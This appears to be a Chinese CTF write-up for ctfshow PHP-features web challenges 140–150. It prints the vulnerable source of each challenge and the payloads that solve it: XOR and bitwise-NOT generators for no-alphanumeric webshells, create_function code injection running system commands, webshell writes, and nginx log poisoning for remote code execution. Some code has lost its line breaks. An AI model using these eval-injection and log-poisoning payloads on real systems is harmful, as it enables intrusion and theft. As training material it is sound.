if(isset($_POST['f1']) && isset($_POST['f2'])){$f1 = (String)$_POST['f1'];$f2 = (String)$_POST['f2'];if(preg_match('/^[a-z0-9]+$/', $f1)){if(preg_match('/^[a-z0-9]+$/', $f2)){$code = eval("return $f1($f2());");if(intval($code) == 'ctfshow'){echo file_get_contents("flag.php");}}}
}
弱类型比较
可以看到0和字符串比较的时候是true
在==比较的时候先将两边转化成同类型的比较,如果是字符转换成整形,则是为0
intval():会将非数字或非数字字符的转换为0
可以构造一个加密函数如:md5,sha1等
Web141
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-17 19:28:09*/#error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){$v1 = (String)$_GET['v1'];$v2 = (String)$_GET['v2'];$v3 = (String)$_GET['v3'];if(is_numeric($v1) && is_numeric($v2)){if(preg_match('/^\W+$/', $v3)){$code = eval("return $v1$v3$v2;");echo "$v1$v3$v2 = ".$code;}}
}
正则表达式:^\W+$ 过虑了数字字母和下划线,使用无字母无数字的webshell
使用异或获得payload
python脚本:
# -- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/10 12:56
# blog: www.wlhhlc.top
import requests
import urllib
import re# 生成可用的字符
def write_rce():result = ''preg = '[a-zA-Z0-9]'for i in range(256):for j in range(256):if not (re.match(preg, chr(i), re.I) or re.match(preg, chr(j), re.I)):k = i ^ jif k >= 32 and k <= 126:a = '%' + hex(i)[2:].zfill(2)b = '%' + hex(j)[2:].zfill(2)result += (chr(k) + ' ' + a + ' ' + b + '\n')f = open('xor_rce.txt', 'w')f.write(result)# 根据输入的命令在生成的txt中进行匹配
def action(arg):s1 = ""s2 = ""for i in arg:f = open("xor_rce.txt", "r")while True:t = f.readline()if t == "":breakif t[0] == i:s1 += t[2:5]s2 += t[6:9]breakf.close()output = "(\"" + s1 + "\"^\"" + s2 + "\")"return (output)def main():write_rce()while True:s1 = input("\n[+] your function:")if s1 == "exit":breaks2 = input("[+] your command:")param = action(s1) + action(s2)print("\n[*] result:\n" + param)main()
运行获得payload
v1和v2需为数字,v3:("%08%02%08%08%05%0d""%7b%7b%7b%7c%60%60")("%0c%08""%60%7b")
因为return 我们需要在v3的前面和后面加上+ - * 等
继续生成payload
Web142
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-17 19:36:02*/error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['v1'])){$v1 = (String)$_GET['v1'];if(is_numeric($v1)){$d = (int)($v1 * 0x36d * 0x36d * 0x36d * 0x36d * 0x36d);sleep($d);echo file_get_contents("flag.php");}
}
只需要给v1传入0即可,要不然…一直等着吧
payload:?v1=0
Web143
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 12:48:14*/highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){$v1 = (String)$_GET['v1'];$v2 = (String)$_GET['v2'];$v3 = (String)$_GET['v3'];if(is_numeric($v1) && is_numeric($v2)){if(preg_match('/[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;/i', $v3)){die('get out hacker!');}else{$code = eval("return $v1$v3$v2;");echo "$v1$v3$v2 = ".$code;}}
}
过虑了更多符号
只需要更改141脚本的规则即可
# -- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/10 12:56
# blog: www.wlhhlc.top
import requests
import urllib
import re# 生成可用的字符
def write_rce():result = ''preg = '[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;'for i in range(256):for j in range(256):if not (re.match(preg, chr(i), re.I) or re.match(preg, chr(j), re.I)):k = i ^ jif k >= 32 and k <= 126:a = '%' + hex(i)[2:].zfill(2)b = '%' + hex(j)[2:].zfill(2)result += (chr(k) + ' ' + a + ' ' + b + '\n')f = open('xor_rce.txt', 'w')f.write(result)# 根据输入的命令在生成的txt中进行匹配
def action(arg):s1 = ""s2 = ""for i in arg:f = open("xor_rce.txt", "r")while True:t = f.readline()if t == "":breakif t[0] == i:s1 += t[2:5]s2 += t[6:9]breakf.close()output = "(\"" + s1 + "\"^\"" + s2 + "\")"return (output)def main():write_rce()while True:s1 = input("\n[+] your function:")if s1 == "exit":breaks2 = input("[+] your command:")param = action(s1) + action(s2)print("\n[*] result:\n" + param)main()
生成paylaod
获得flag文件
生成查看flag文件payload
获得flag
Web144
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 16:21:15*/highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){$v1 = (String)$_GET['v1'];$v2 = (String)$_GET['v2'];$v3 = (String)$_GET['v3'];if(is_numeric($v1) && check($v3)){if(preg_match('/^\W+$/', $v2)){$code = eval("return $v1$v3$v2;");echo "$v1$v3$v2 = ".$code;}}
}function check($str){return strlen($str)===1?true:false;
}
在141的基础上把v2和v3换一下值即可
Web145
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 17:41:33*/highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){$v1 = (String)$_GET['v1'];$v2 = (String)$_GET['v2'];$v3 = (String)$_GET['v3'];if(is_numeric($v1) && is_numeric($v2)){if(preg_match('/[a-z]|[0-9]|\@|\!|\+|\-|\.|\_|\$|\}|\%|\&|\;|\<|\>|\*|\/|\^|\#|\"/i', $v3)){die('get out hacker!');}else{$code = eval("return $v1$v3$v2;");echo "$v1$v3$v2 = ".$code;}}
}
没有过虑取反~ |可以用
取反脚本:
<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
运行获得payload
使用|对v3前后加上
Web146
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 17:41:33*/highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){$v1 = (String)$_GET['v1'];$v2 = (String)$_GET['v2'];$v3 = (String)$_GET['v3'];if(is_numeric($v1) && is_numeric($v2)){if(preg_match('/[a-z]|[0-9]|\@|\!|\:|\+|\-|\.|\_|\$|\}|\%|\&|\;|\<|\>|\*|\/|\^|\#|\"/i', $v3)){die('get out hacker!');}else{$code = eval("return $v1$v3$v2;");echo "$v1$v3$v2 = ".$code;}}
}
过虑了异或没有过虑取反 做法和145相同
Web147
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 02:04:38*/highlight_file(__FILE__);if(isset($_POST['ctf'])){$ctfshow = $_POST['ctf'];if(!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)) {$ctfshow('',$_GET['show']);}}
对ctf进行了过虑,get传入的show和post传入的ctf进行整合
使用create_function()代码注入
例子
而正则可以使用****进行绕过,****在php中代表默认命名空间
加上****表示的是一个绝对路径
paydloa:post:ctf=\create_function
get:?show=echo 123;}system(“tac flag.php”);//
Web148
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 03:52:11*/include 'flag.php';
if(isset($_GET['code'])){$code=$_GET['code'];if(preg_match("/[A-Za-z0-9_\%\\|\~\'\,\.\:\@\&\*\+\- ]+/",$code)){die("error");}@eval($code);
}
else{highlight_file(__FILE__);
}function get_ctfshow_fl0g(){echo file_get_contents("flag.php");
}
做法同141
Web149
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 04:34:40*/error_reporting(0);
highlight_file(__FILE__);$files = scandir('./');
foreach($files as $file) {if(is_file($file)){if ($file !== "index.php") {unlink($file);}}
}file_put_contents($_GET['ctf'], $_POST['show']);$files = scandir('./');
foreach($files as $file) {if(is_file($file)){if ($file !== "index.php") {unlink($file);}}
}
如果此目录下除了index.php之外的文件则会被删除
直接在index.php中写入木马,然后连接即可获得flag
Web150
源码:
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 07:12:57*/
include("flag.php");
error_reporting(0);
highlight_file(__FILE__);class CTFSHOW{private $username;private $password;private $vip;private $secret;function __construct(){$this->vip = 0;$this->secret = $flag;}function __destruct(){echo $this->secret;}public function isVIP(){return $this->vip?TRUE:FALSE;}}function __autoload($class){if(isset($class)){$class();}
}#过滤字符
$key = $_SERVER['QUERY_STRING'];
if(preg_match('/\_| |\[|\]|\?/', $key)){die("error");
}
$ctf = $_POST['ctf'];
extract($_GET);
if(class_exists($__CTFSHOW__)){echo "class is exists!";
}if($isVIP && strrpos($ctf, ":")===FALSE){include($ctf);
}
文件包含非预期绕过
需要isVIP为true或者是1
因为有extract(),可以get给isVIP传参1
可以包含日志/var/log/nginx/access.log
先给日志中插入一句话木马
post传参ctf:/var/log/nginx/access.log
get传参:?isVIP=1&1=system(‘cat flag.php’);
获得flag
ctfshow web入门 特性相关推荐
- [ctfshow web入门]常用姿势801-806
1NDEX 0x00 前言 801 flask pin码计算 谨记!!python 3.8和3.6 pin码生成方式不同 werkzeug版本不同machine-id获取不同 python3.8 pi ...
- ctfshow web入门-sql注入
ctfshow web入门-sql注入 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web ...
- [ctfshow]web入门——文件上传(web156-web163)
[ctfshow]web入门--文件上传(web156-web163) [ctfshow]web入门--文件上传 [ctfshow]web入门--文件上传(web156-web163) web156 ...
- CTFShow web入门题刷题记录
CTFShow web入门题刷题记录(信息搜集) web1 提示:开发注释未及时删除 打开网页查看源代码发现 flag:flag{2b2cf8e3-f880-41e1-a8ff-02601b3d998 ...
- 无字母数字rce(ctfshow web入门56)
无字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){$c=$_GET[' ...
- ctfshow web入门-XXE
ctfshow web入门-XXE web373 题目描述 解题思路 web374 题目描述 解题思路 web375 题目描述 解题思路 web376 题目描述 解题思路 web377 题目描述 解题 ...
- ctfshow web入门 命令执行 web29~web77 web118~web124
目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 w ...
- ctfshow web入门 反序列化 前篇 254-266
这里266后面主要是框架,以后在讲 反序列化入门可以参考我写的另一篇很详细的哦~php 反序列化总结 web254 <?phperror_reporting(0); highlight_file ...
- Ctfshow web入门 PHP特性篇 web89-web151 全
web入门 PHP特性篇的wp都一把梭哈在这里啦~ 有点多,师傅们可以收藏下来慢慢看,写的应该挺全面的叭- 有错误敬请斧正! CTFshow PHP web89 看题目,有个flag.php文件.题目 ...
最新文章
- 程序员,你就是三明治!
- 轻量级 Kubernetes 发行版 k3s 1.0.0 发布!
- Android 反射、代理调用系统隐藏API方法与接口类连接Wi-Fi
- java快速压缩文件夹_如何使用java压缩文件夹本身
- 线性表—线性表的合并
- 企业会计准则2020版pdf_企业会计准则及应用指南(2017版)
- python axes函数_matplotlib中的axes.flat做什么?
- WebAPI2使用Autofac实现IOC属性注入完美解决方案
- [Bzoj1597][Usaco2008 Mar]土地购买(斜率优化)
- python微控制器编程从零开始 开发板_TPYBOARD单片机开发板PYTHON语言控制单片机
- 小白如何搭建自己的网络服务器
- 多系统启动菜单的修复EasyBoot
- Easyui datagrid数据清空
- (翻译)关系型数据库工作原理(二)
- 谷歌身份验证器验证码不对怎么回事_兼容谷歌验证器,开源的动态验证码小程序了解一下...
- 网页在PC 上运行正常,在IPad上运行出错的故障原因分析及应对措施
- Redhat Linux 5.3环境实施DB2 V9.7 HADR
- 正则表达式获取图片地址及超链接
- Multi-Objective Computation Sharing in Energy and Delay Constrained Mobile Edge Computing
- HYSBZ 2565 Manacher算法